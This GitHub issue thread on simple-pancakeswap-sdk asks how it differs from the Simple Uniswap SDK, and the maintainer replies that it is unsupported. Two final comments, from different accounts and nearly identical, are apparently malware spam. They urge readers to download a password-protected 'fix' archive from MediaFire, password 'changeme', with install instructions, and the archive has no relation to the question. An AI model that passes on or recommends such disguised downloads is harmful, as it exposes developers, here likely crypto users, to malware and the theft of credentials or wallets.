### ISSUE TITLE
What is different between this and Simple Uniswap

### ISSUE THREAD

**Issue by niZmosis** [joshstevens19/simple-pancakeswap-sdk#10]
This package is so close to the regular Simple-Uniswap-SDK, I am wondering what is so different for there to be two different packages. With the Uniswap one we can enter custom networks to support BSC and pancake. Wouldn't it be better to make a Simple-Dex-SDK and support both? That way we can use predefined network easier. For example, I am having a hell of a time in simple Uniswap to get the native BNB coin as a trade, when in this package they have BNB setup like ETH and can easily call the native tokens contract to trade.

**Comment by joshstevens19** [comment]
Simple uniswap sdk already supports forks it’s just not documented too well example how to use here 

https://github.com/Anish-Agnihotri/pool-sniper/blob/master/src/sniper.ts#L75

This package is not supported and people should use the simple uniswap sdk instead. Il comment on these packages to state this and improve the docs! Thanks for this

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
